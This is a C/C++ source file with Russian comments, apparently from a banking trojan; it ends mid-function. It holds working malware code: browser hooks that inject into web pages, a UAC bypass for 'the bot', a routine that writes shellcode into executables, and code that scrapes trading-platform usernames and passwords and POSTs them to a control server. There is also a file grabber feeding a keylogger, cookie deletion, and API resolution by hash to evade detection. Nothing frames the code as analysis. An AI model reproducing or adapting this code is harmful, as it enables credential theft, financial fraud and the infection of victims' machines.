bool UpdateContentLength(PREQUEST Request, bool FreeOldBuf)
{
// Функция обновляет заголовок "Content-Length" в заголовках HTTP запроса
char * Buffer = (char *)Request->pBuf;
// копируем HTTP заголовок
int HeaderOffset = m_istrstr(Buffer, "\r\n\r\n" );
if (HeaderOffset == -1)
return false;
HeaderOffset += 4; // увеличиваем размер заголовка на "\r\n\r\n"
PCHAR Header = StrNew(Buffer, HeaderOffset);
if (Header == NULL)
return false;
// Лпределяем позицию параметра в заголовках
m_lstrlwr(Header); // приводим заголовок к нижнему регистру
char CL[] = {'c','o','n','t','e','n','t','-','l','e','n','g','t','h',':',' ',0};
int Pos = m_istrstr(Header, CL);
StrFree(Header);
if (Pos == -1)
return false;
// Копируем оригинальный заголовок
DWORD ParamLen = m_lstrlen(CL);
char *ParamName = (char*)MemAlloc(ParamLen + 1);
if (ParamName == NULL)
return false;
m_memcpy(ParamName, Buffer + Pos, ParamLen);
// Создаём строку с новым значением
DWORD NewValue = m_lstrlen(Buffer + HeaderOffset);
char NewContentLen[10];
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
pwsprintfA(NewContentLen, "%d", NewValue);
// Вписываем новое значение
char *NewBuffer = NULL;
bool Result = SubstituteText(Buffer, 0, &NewBuffer, ParamName, NewContentLen, "\r\n") >= 0;
MemFree(ParamName);
// Меняем буфер запроса
if (Result)
{
if (FreeOldBuf)
MemFree(Request->pBuf);
Request->pBuf = (LPBYTE)NewBuffer;
Request->uBufSize = m_lstrlen(NewBuffer);
}
return Result;
}
bool SubstituteHeader( char *Header )
{
char gzip_deflate[] = {'g','z','i','p',',','d','e','f','l','a','t','e',0};
DWORD dwStart = m_istrstr( Header, gzip_deflate );
if ( dwStart != (DWORD)-1 )
{
for ( DWORD i = 0; i < m_lstrlen( gzip_deflate ); i++ )
{
Header[ dwStart + i ] = ' ';
}
}
char Http[] = {'H','T','T','P','/','1','.',0};
DWORD dwHttp = m_istrstr( Header, Http );
if ( dwHttp != (DWORD)-1 )
{
Header[ dwHttp + m_lstrlen( Http ) ] = '0';
return true;
}
return false;
}
//-----------------------------------------------------------------------------
bool WildCmp( const char *Buffer, const char *Mask, LPDWORD Start, LPDWORD End, LPDWORD Len )
{
int skip[256];
int lenBuffer = m_lstrlen(Buffer);
int lenMask = m_lstrlen(Mask);
if( lenMask == 0 ) //если маска пустая
if( lenBuffer == 0 )
return true;
else
return false;
else
if(lenBuffer == 0)
return false;
bool cmp = true; //результат сравнения
int pBuffer = 0; //позиция начала сравнения
int pMask = 0; //позиция начала символов в маске
*Start = WILD_CMP_POS_MAX;
while( pBuffer < lenBuffer )
{
while( pMask < lenMask && Mask[pMask] == '*' ) pMask++; //игнорируем начальные *
if( pMask >= lenMask ) break; //закончилась маска
int begMask = pMask;
while( pMask < lenMask && Mask[pMask] && Mask[pMask] != '*' ) ////ищем за символами символ * пока не дойдем до конца маски
{
pMask++;
}
const char* find;
int lenMask2 = pMask - begMask;
const char* end; //последний найденный символ в Buffer, необходим для дальнейшего поиска
InitTblSkip( Mask + begMask, pMask - begMask, skip );
find = FindStr( Buffer + pBuffer, lenBuffer - pBuffer, Mask + begMask, lenMask2, skip, &end );
if( find == 0 )
{
cmp = false;
break;
}
pBuffer = find - Buffer; //позиция найденной строки
if( *Start == WILD_CMP_POS_MAX ) *Start = pBuffer; //если еще ничего не находили, то запоминаем
pBuffer = end - Buffer + 1; //позиция с которой продолжим поиск
*End = pBuffer;
pMask++;
}
if( cmp )
{
if( *Start == WILD_CMP_POS_MAX ) //такое может быть если маска это одни *
{
*Start = 0;
*End = lenBuffer;
}
*Len = *End - *Start + 1;
return true;
}
return false;
}
int DeleteIECookies(int os, HCAB hCab)
{
char username[256];
DWORD name_len = 256;
if(!(BOOL)pGetUserNameA(&username[0], &name_len)) return 0;
//return 10;
char *Path_cookies = NULL;
switch(os)
{
case 1:
Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies"));
m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\");
m_lstrcat(Path_cookies,&username[0]);
m_lstrcat(Path_cookies,"\\Cookies\\");
break;
case 2:
Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies"));
m_lstrcpy(Path_cookies,"C:\\Users\\");
m_lstrcat(Path_cookies,&username[0]);
m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\");
break;
default:
return -1;
}
DeleteFiles(Path_cookies, "*.txt", true, false, hCab);
/*
if(Path_cookies == NULL) return -1;
WIN32_FIND_DATA data;
char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2);
m_lstrcpy(Path_cookies_find,Path_cookies);
m_lstrcat(Path_cookies_find,"\\*");
HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data);
if(nFindFile==NULL) return -1;
do
{
if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue;
char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1);
m_lstrcpy(Path_file,Path_cookies);
m_lstrcat(Path_file,"\\");
m_lstrcat(Path_file,data.cFileName);
if(!DeleteFile(Path_file))
{
DWORD err = pGetLastError();
}
//MemFree(Path_file);
}
while(FindNextFile(nFindFile,&data));
FindClose(nFindFile);
//MemFree(Path_cookies);*/
return 0;
}
bool GetHeader2( char *Buffer, char **Header )
{
char HTTP[] = {'H','T','T','P','/','1','.',0};
if ( !m_lstrncmp( Buffer, HTTP, 7 ) )
{
DWORD dwSize = m_istrstr( Buffer, "\r\n\r\n" );
if ( dwSize == (DWORD)-1 )
{
dwSize = m_lstrlen( Buffer );
}
dwSize += 4;
char *Hdr = (char*)MemAlloc( dwSize + 1 );
if ( Hdr != NULL )
{
m_memcpy( Hdr, Buffer, dwSize );
Hdr[ dwSize ] = '\0';
m_lstrlwr( Hdr );
*Header = Hdr;
return true;
}
}
return false;
}
bool RunBotBypassUAC( int method, int task, const char* args )
{
bool ret = false;
method = 0; //используем только метод обхода 0
string path = BOT::GetBotFullExeName();
DBG( "Exe бота %s превращаем в длл", path.t_str() );
DWORD dataSize;
BYTE* data = File::ReadToBufferA( path.t_str(), dataSize );
if( data == 0 ) return false;
if( ConvertExeToDll(data) )
{
int lenArgs = m_lstrlen(args); //размер памяти под аргументы
int szTask = sizeof(BypassUACTask) + lenArgs + 1;
BypassUACTask* ptask = (BypassUACTask*)MemAlloc(szTask);
ptask->time = (DWORD)pGetTickCount();
ptask->task = task;
ptask->lenArgs = lenArgs;
m_memcpy( ptask->args, args, lenArgs + 1 );
if( File::WriteBufferA(BOT::MakeFileName( 0, FileTask ).t_str(), ptask, szTask ) == szTask )
{
ret = RunDllBypassUAC( data, dataSize, method );
if( !ret ) //по какой-то причине не сработало
pDeleteFileA(BOT::MakeFileName( 0, FileTask ).t_str() );
}
MemFree(ptask);
}
MemFree(data);
return ret;
}
int GetContentLen( char *Header )
{
char *ContentLength = NULL;
if ( GetText( Header, &ContentLength, HeaderContentLength, "\r\n" ) != -1 )
return m_atoi( ContentLength ) + m_lstrlen( Header );
return -1;
}
char * WINAPI m_strstr( const char * _Str, const char * _SubStr )
{
if( !_Str || !_SubStr )
return NULL;
int f = 1;
int s;
size_t sslen = m_lstrlen( (char*)_SubStr );
for ( char* p = (char*)_Str; f; p++ )
{
char* k = (char*)_SubStr;
if ( *p == 0 )
{
break;
}
if ( *k == 0 )
{
break;
}
if ( *p == *k )
{
char* p1 = p;
char* k1 = k;
s = 0;
for( ; true; )
{
if( *p1 == *k1 )
{
s++;
}
if( s == (int)sslen )
{
return p;
}
if( *p1 != *k1 )
{
break;
}
p1++;
k1++;
}
}
}
return NULL;
}
// Формирования строки UID с указанным префиксом
string GenerateUidAsString(const string& Prefix)
{
string uid = Prefix;
PCHAR uid_ptr = MakeMachineID();
size_t uid_size = m_lstrlen(uid_ptr);
if (Prefix.Length() > 0) uid += "0";
uid += uid_ptr;
return uid;
}
bool WINAPI m_lstrncpy( char *pString_src, const char *pString_dst, DWORD len )
{
if ( !pString_dst || !pString_src )
{
return false;
}
if ( m_lstrlen( (char*)pString_dst ) < len )
{
len = m_lstrlen( (char*)pString_dst );
}
for ( DWORD i = 0; i < len; i++ )
{
pString_src[i] = pString_dst[i];
}
return true;
}
char* trimall( char* s, char c )
{
int len = m_lstrlen(s);
char* p1 = s;
while( *p1 == c && *p1 != 0 ) p1++;
char* p2 = s + len - 1;
while( *p2 == c && p2 > p1 ) p2--;
len = p2 - p1 + 1;
m_memcpy( s, p1, len );
s[len] = 0;
return s;
}
char* SafeCopyStr( char* dst, int szDst, const char* src )
{
if( dst == 0 || szDst <= 0 ) return 0;
if( src == 0 )
{
dst[0] = 0;
return dst;
}
int len = m_lstrlen(src);
if( len > szDst - 1 ) len = szDst - 1;
m_memcpy( dst, src, len );
dst[len] = 0;
return dst;
}
int GetSize( char *Buffer, LPDWORD dwSize )
{
char *Header = NULL;
if ( GetHeader2( Buffer, &Header ) )
{
DWORD dwHeaderEnd = m_lstrlen( Header );
DWORD dwContentLen = GetContentLen( Header );
if ( dwContentLen == (DWORD)-1 )
{
DWORD dwOffset = 0;
if ( ( dwOffset = (DWORD)GetHeader1( Buffer + dwHeaderEnd, &Header ) ) != -1 )
{
MemFree( Header );
*dwSize = dwHeaderEnd + dwOffset - m_lstrlen( Header );
return 1;
}
else
{
return 2;
}
}
else
{
MemFree( Header );
*dwSize = dwContentLen;
return 3;
}
}
MemFree( Header );
return 0;
}
BOOL SaveManifest(PCHAR FileName)
{
PCHAR manifest = STR::Alloc(1024);
BOOL ret;
manifest[0] = 0;
for ( int i =0; i< sizeof(Manifest)/sizeof(Manifest[0]); ++i)
{
m_lstrcat(manifest,Manifest[i]);
m_lstrcat(manifest,"\r\n");
};
ret = File::WriteBufferA(FileName,manifest,m_lstrlen(manifest));
STR::Free(manifest);
return ret;
};
int WINAPI m_istrstr( const char * _Str, const char * _SubStr )
{
// Функция ищет подстроку _SubStr в строке _Str
if( !_Str || !_SubStr )
return -1;
DWORD s;
DWORD j = 0;
// size_t slen = m_lstrlen( (char*)_Str );
size_t sslen = m_lstrlen( (char*)_SubStr );
// Проходим циклом до конца строки
char *p = (char*)_Str;
while (*p != 0)
{
char* k = (char*)_SubStr;
// сравниваем первые символы
if ( *p == *k )
{
char* p1 = p;
char* k1 = k;
s = 0;
// Определяем количество совпадений
while(*p1 != 0 && *k1 != 0)
{
if (*p1 == *k1)
s++;
else
break;
if (s == (DWORD)sslen)
return j;
p1++;
k1++;
}
}
// смещаем указатели
p++;
j++;
}
return -1;
}
void WINAPI m_lstrlwr( char *str )
{
if ( !str )
{
return;
}
int n = m_lstrlen( str );
for(int i = 0; i < n; i++ )
{
if ( str[i] >= 65 && str[i] <= 90 )
{
str[i] += 32;
}
}
}
bool DoInjectFF(PREQUEST Request)
{
// Обрабатываем загруженные данные
char *NewBuffer;
bool Changed = false; // Признак сработавшего инжекта
bool FreeBuf = false;
THTTPSessionInfo Session; // Описание сессии
Session.BrowserType = BROWSER_TYPE_FF;
Session.UserAgent = FFUserAgent;
Session.URL = Request->Url;
// перебираем все маски для загруженного сайта
for (DWORD i = 0; i < Request->dwInjCount; i++ )
{
if ( HandleHTML((char*)Request->pBuf, NewBuffer, &Request->pInject[i], &Session))
{
Changed = true;
// Если в исходный код были внесены изменения то заменяем старый
// буффер на новый
if (NewBuffer != NULL)
{
if (FreeBuf)
MemFree(Request->pBuf);
Request->pBuf = (LPBYTE)NewBuffer;
Request->uBufSize = m_lstrlen(NewBuffer);
UpdateContentLength(Request, FreeBuf);
FreeBuf = true;
}
}
}
return Changed;
}
void InitSession( char *Host, int Port, char *Uid, char *Password )
{
char Buffer[ 1024 ];
int r = 0;
SOCKET Socket = NetConnect( Host, Port );
if ( Socket != INVALID_SOCKET )
{
r = NetRecv( Socket, Buffer, 6 );
if ( r )
{
Buffer[ 6 ] = 0;
if ( !m_lstrncmp( Buffer, "HELLO\n", 6 ) )
{
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
_pwsprintfA( Buffer, "%s:%s\n", Uid, Password );
NetSend( Socket, Buffer, m_lstrlen( Buffer ) );
if ( NetRecv( Socket, Buffer, 6 ) )
{
Buffer[ 6 ] = 0;
if ( !m_lstrncmp( Buffer, "READY\n", 6 ) )
{
SessionWork( Socket );
}
}
}
}
pclosesocket( Socket );
}
bool SendTradeInfo( char *Buffer )
{
string Serv = GetActiveHost();
if ( Serv.IsEmpty())
return 0;
char Host[30];
m_lstrcpy( Host, Serv.t_str());
char Script[] = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0};
char Args[] = "id=%s&data=%s";
char Request[] = "POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Uid[100];
GenerateUid( Uid );
char *Data = URLEncode( Buffer );
char *PartReq = (char*)MemAlloc( 1024 );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
if ( PartReq == NULL )
{
return false;
}
_pwsprintfA( PartReq, Args, Uid, Data );
char *Header = (char*)MemAlloc( 1024 );
if ( Header == NULL )
{
MemFree( PartReq );
return false;
}
char *UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
_pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) );
MemFree( UserAgent );
char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 );
if ( SendBuffer == NULL )
{
MemFree( PartReq );
MemFree( Header );
return false;
}
m_lstrcpy( SendBuffer, Header );
m_lstrcat( SendBuffer, PartReq );
m_lstrcat( SendBuffer, "\r\n" );
MemFree( Header );
MemFree( PartReq );
SOCKET Socket = MyConnect( Host, 80 );
bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) );
pclosesocket( Socket );
MemFree( SendBuffer );
return Ret;
}
PRInt32 PR_ReadHook( PRFileDesc *fd, void* buf, PRInt32 amount )
{
PREQUEST pReq = FindRequestByFd( fd );
if ( pReq != NULL && pReq->bIsInject )
{
int Bytes = MyReadRoutine( pReq );
if ( !pReq->uBufSize )
{
return -1;
}
if ( !Bytes )
{
pReq->bDownloaded = true;
}
DWORD dwSize = 0;
DWORD dwOld = pReq->uBufPos;
while ( 1 )
{
int Size = GetSize( (char*)pReq->pBuf + pReq->uBufPos, &dwSize );
if ( Size == 2 )
{
char *Header = NULL;
if ( pReq->uBufPos != pReq->uBufSize )
{
GetHeader2( (char*)pReq->pBuf + pReq->uBufPos, &Header );
}
if ( pReq->bDownloaded )
{
pReq->uBufPos = pReq->uBufSize;
}
else
{
if ( Header != NULL && m_lstrlen( Header ) == pReq->uBufSize - pReq->uBufPos )
{
char H1[] = {'h','t','t','p','/','1','.','1',' ','2','0','0',0};
char H2[] = {'h','t','t','p','/','1','.','0',' ','2','0','0',0};
bool Fwd = true;
if ( !m_lstrncmp( Header, H1, m_lstrlen( H1 ) ) || !m_lstrncmp( Header, H2, m_lstrlen( H2 ) ) )
{
Fwd = false;
}
if ( pReq->dwTry == 2 || Fwd )
{
pReq->uBufPos = pReq->uBufSize;
}
if ( !Fwd )
{
pReq->dwTry++;
}
}
}
MemFree( Header );
break;
}
else if ( Size == 1 || Size == 3 )
{
DWORD dwLen = pReq->uBufPos + dwSize;
if ( dwLen < pReq->uBufSize )
{
pReq->uBufPos = dwLen;
}
else if ( dwLen == pReq->uBufSize )
{
pReq->uBufPos = dwLen;
break;
}
else if ( dwLen > pReq->uBufSize )
{
break;
}
}
else
{
break;
}
}
if ( dwOld != pReq->uBufPos )
{
InjectPart( pReq, dwOld );
}
if ( !pReq->uOverSize || pReq->uOverSize == dwOld )
{
pReq->uOverSize = pReq->uBufPos;
}
if ( pReq->uOverPos < pReq->uOverSize )
{
int dwMaxSize = min( amount, pReq->uOverSize - pReq->uOverPos );
m_memcpy( buf, pReq->pBuf + pReq->uOverPos, dwMaxSize );
pReq->uOverPos += dwMaxSize;
return dwMaxSize;
}
if ( pReq->bDownloaded && pReq->uOverPos == pReq->uBufSize )
return 0;
return -1;
}
return PR_ReadReal(fd, buf, amount);
}
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine )
{
DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode);
DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
DBG( "Shellcode size is %d bytes", totalSize);
PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)
((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew);
PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER)
(headers->FileHeader.SizeOfOptionalHeader +
(PUCHAR)&headers->OptionalHeader);
DWORD numberOfSections = headers->FileHeader.NumberOfSections;
// enumerate sections
for( int i = 0; i < (int)numberOfSections; i++ )
{
// check for resources section
if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) )
{
if( section->SizeOfRawData < totalSize )
{
DBG( "ERROR: Not enough free space in '.rsrc'" );
return false;
}
// fill shellcode parameters
PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData);
m_memset( params, 0, sizeof(SHELLCODE_PARAMS) );
params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint;
HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll");
params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" );
params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" );
if( commandLine )
m_lstrcpy( params->szCommandLine, commandLine );
m_lstrcpy( params->szDllPath, dllPath );
// copy shellcode
PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1);
m_memcpy( shellcode, Shellcode, shellcodeSize);
// replace address of entry point
headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress +
sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
// make section executable
section->Characteristics |= IMAGE_SCN_MEM_EXECUTE;
headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL;
headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0;
DWORD headerSum = 0, checkSum = 0;
// recalculate checksum
if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) )
headers->OptionalHeader.CheckSum = checkSum;
else
DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() );
DBG( "OK" );
break;
}
section++;
}
return true;
}
void ParseTrade( HWND hWnd )
{
char *Program = NULL;
if ( !pTradeInfo )
{
return;
}
if ( IsBlackwoodPro() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 1022;
pTradeInfo->dwPassID = 1023;
pTradeInfo->dwServID = 1687;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
while ( !(BOOL)pEnumChildWindows( (HWND)pGetParent( (HWND)pGetActiveWindow() ), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) ||
!m_lstrlen( pTradeInfo->Server ) )
{
return;
}
Program = "BlackwoodPRO";
}
else if ( IsFinamDirect() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 5328;
pTradeInfo->dwPassID = 5329;
pTradeInfo->dwServID = 159;
pTradeInfo->dwAccID = 5965;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) ||
!m_lstrlen( pTradeInfo->UserID ) ||
!m_lstrlen( pTradeInfo->Server ) )
{
return;
}
Program = "FinamDirect";
}
else if ( IsGrayBox() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 1000;
pTradeInfo->dwPassID = 1001;
pTradeInfo->dwServID = 1147;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) ||
!m_lstrlen( pTradeInfo->Server ) )
{
return;
}
Program = "GrayBox";
}
else if ( IsMbtPro() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 309;
pTradeInfo->dwPassID = 310;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) )
{
return;
}
Program = "MbtPRO";
}
else if ( IsLaser() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 1062;
pTradeInfo->dwPassID = 1064;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) )
{
return;
}
Program = "Laser";
}
else if ( IsLightSpeed() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 10826;
pTradeInfo->dwPassID = 10825;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) )
{
return;
}
Program = "LightSpeed";
}
else if ( IsLT() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 5328;
pTradeInfo->dwPassID = 5329;
pTradeInfo->dwServID = 159;
pTradeInfo->dwAccID = 5965;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) ||
!m_lstrlen( pTradeInfo->UserID ) ||
!m_lstrlen( pTradeInfo->Server ) )
{
return;
}
Program = "LTGroup";
}
else if ( IsMbt() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 309;
pTradeInfo->dwPassID = 310;
pTradeInfo->dwServID = 311;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) ||
!m_lstrlen( pTradeInfo->Server ) )
{
return;
}
Program = "Mbt";
}
else if ( IsScotTrader() && TradeGetWindowID( hWnd ) == 1 )
{
pTradeInfo->dwUserID = 1076;
pTradeInfo->dwPassID = 1005;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) )
{
return;
}
Program = "ScotTrader";
}
else if ( IsSaxoTrader() && TradeGetWindowID2( hWnd ) == 1442918145 )
{
pTradeInfo->dwUserID = 1442906816;
pTradeInfo->dwPassID = 1442906848;
while ( !(BOOL)pEnumChildWindows( (HWND)pGetActiveWindow(), (WNDENUMPROC)EnumWindowsProc2, NULL ) );
if ( !m_lstrlen( pTradeInfo->Username ) ||
!m_lstrlen( pTradeInfo->Password ) )
{
return;
}
Program = "SaxoTrader";
}
if ( Program != NULL )
{
char *Buffer = (char*)MemAlloc( 1024 );
char Template[] = "Program: %s\r\n"
"Username: %s\r\n"
"Password: %s\r\n"
"AccountNO: %s\r\n"
"Server: %s\r\n";
if ( Buffer != NULL )
{
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
_pwsprintfA( Buffer, Template, Program, pTradeInfo->Username, pTradeInfo->Password, pTradeInfo->UserID, pTradeInfo->Server );
SendTradeInfo( Buffer );
MemFree( Buffer );
MemFree( pTradeInfo->Server );
MemFree( pTradeInfo->Username );
MemFree( pTradeInfo->Password );
MemFree( pTradeInfo->UserID );
if ( ( pTradeInfo = (PTRADEINFO)MemAlloc( sizeof( PTRADEINFO ) ) ) != NULL )
{
m_memset( pTradeInfo, 0, sizeof( PTRADEINFO ) );
}
}
}
//Проверяет каждого получателя и отсылаем им оповещения о срабатывании хука, согласно условиям получателя
void SendEvent( ParamEvent& e )
{
if( !receivers )
return;
int count = List::Count(receivers);
for( int i = 0; i < count; i++ )
{
Receiver* rv = (Receiver*)List::GetItem( receivers, i );
if( !rv->ignore && e.access & rv->access ) //тип доступа
{
int send = 0; //слать событие (>0) или нет (=0)
int extFilter = FilterExt( e, rv );
if( extFilter > 0 ) //фильтер сработал
{
if( extFilter == 2 ) //файл нужного нам расширения
{
if( rv->aw & LOADFILE ) //нужно загрузить
LoadFile(e);
send = 1;
}
}
else
{
DWORD h;
e.szData = (DWORD)pGetFileSize( e.file, &h );
//подходит ли размер
if( e.szData >= rv->minSize && (e.szData <= rv->maxSize || rv->maxSize < 0))
{
if( rv->maska || rv->aw & FILEISBIN || rv->ignoreBeg[0][0] )
{
if( LoadFile(e) )
{
if( !IsFormatBeg( e, rv ) ) //файл не игнорируемого формата
{
//если есть какой-то из фильтров, то сообщаем только тогда когда есть реакция на один из них
bool filters = false; //проходил ли через какой-то фильтер
for(;;)
{
//проверяем маску
if( rv->maska )
{
filters = true;
if( WildCmp( (char*)e.data, rv->maska ) )
{
send = 2; break;
}
}
if( rv->aw & FILEISBIN )
{
filters = true;
if( IsBin( (BYTE*)e.data, e.szData ) )
{
send = 3; break;
}
}
if( rv->aw & FILEISBASE64 )
{
filters = true;
if( IsBase64( (BYTE*)e.data, e.szData ) )
{
send = 4; break;
}
}
if( filters ) send = 0; //если ни один из фильтров не сработал, то сообщение не шлем
break;
}
}
}
}
else
{
if( rv->aw & LOADFILE ) //нужно загрузить
LoadFile(e);
send = 5; //нужно оповещать о файлах определенного размера
}
}
}
if( rv->FuncReceiver && send > 0 )
{
e.nameSend[0] = 0;
if( e.unicode )
{
DBG("FileGrabberW", "Отреагировали на файл '%ls'(%d), size: %d", e.fileNameW, send, e.szData );
e.fileName = WSTR::ToAnsi( e.fileNameW, 0 );
}
else
{
DBG("FileGrabberA", "Отреагировали на файл '%s'(%d), size: %d", e.fileNameA, send, e.szData );
e.fileName = (char*)e.fileNameA;
}
e.shortName = File::ExtractFileNameA( e.fileName, false );
//ищем расширение
e.extFile = 0;
const char* p = STR::ScanEnd( (char*)e.shortName, '.' );
if( p ) e.extFile = p + 1;
int res = rv->FuncReceiver(&e);
if( res & SENDFILE ) //если возвращает SENDFILE, то отправляем содержимое
{
if( e.data )
{
const char* nameSend = "FileGrabber";
if( res & CURRNAMEFILE ) //извлекаем имя из полного имени файла
nameSend = e.shortName;
else
if( res & CURRFULLNAMEFILE ) //имя файла с полными путями
nameSend = e.fileName;
else
if( e.nameSend[0] ) //имя передал получатель
nameSend = e.nameSend;
DBG( "FileGrabber", "Отправили файл '%s' под именем '%s'", e.fileName, nameSend );
KeyLogger::AddFile( 0, (char*)nameSend, e.data, e.szData );
}
}
else
if( res & SENDFOLDER )
{
pPathRemoveFileSpecA(e.fileName);
//добавляем в конце слеш, так функция PathRemoveFileSpec его убирает
int sz = m_lstrlen(e.fileName);
if( e.fileName[sz - 1] != '\\' )
{
e.fileName[sz] = '\\';
e.fileName[sz + 1] = 0;
sz++;
}
DBG( "FileGrabber", "Отправляем папку '%s' под именем '%s'", e.fileName, e.nameSend );
int currState = stateGrabber;
stateGrabber |= IGNOREHOOK; //отключаем граббер
KeyLogger::AddDirectory( e.fileName, e.nameSend );
stateGrabber = currState; //восстанавливаем состояние
}
if( res & STOPRECEIVER )
rv->ignore = true;
if( e.fileName != e.fileNameA ) //освобождаем память, если была перекодировка
STR::Free(e.fileName);
}
}
}
MemFree(e.data);
e.data = 0;
}
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 80;
if ( !ParseUrl( Url, &Host, &Path, &Port ) )
{
return false;
}
SOCKET Socket = MyConnect( Host, Port );
if( Socket == -1 )
{
return false;
}
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
char *query=(char*)MemAlloc(2048);
m_lstrcpy(query,"GET /");
m_lstrcat(query,Path);
